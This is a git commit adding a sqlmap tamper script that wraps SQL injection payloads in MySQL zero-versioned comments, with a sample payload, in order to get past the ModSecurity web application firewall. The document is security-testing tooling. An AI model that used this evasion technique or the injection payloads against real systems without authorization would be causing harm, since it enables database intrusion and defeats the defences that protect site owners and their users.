new tamper script

2024-11-22 01:26:42 +03:00 · 2011-10-25 13:40:32 +00:00 · 2011-10-25 13:40:32 +00:00 · 38e2d0896b
commit 38e2d0896b
parent 9523da7663
1 changed files with 47 additions and 0 deletions
--- a/tamper/modsecurityzeroversioned.py
+++ b/tamper/modsecurityzeroversioned.py
@ -0,0 +1,47 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGHER
+
+def dependencies():
+    pass
+
+def tamper(payload):
+    """
+    Embraces complete query with zero-versioned comment
+
+    Example:
+        * Input: 1 AND 2>1--
+        * Output: 1 /*!00000AND 2>1*/--
+
+    Requirement:
+        * MySQL
+
+    Tested against:
+        * MySQL 5.0
+
+    Notes:
+        * Useful to bypass ModSecurity WAF/IDS
+    """
+
+    retVal = payload
+
+    if payload:
+        postfix = ''
+        for comment in ('#', '--', '/*'):
+            if comment in payload:
+                postfix = payload[payload.find(comment):]
+                payload = payload[:payload.find(comment)]
+                break
+        if ' ' in payload:
+            retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)
+
+    return retVal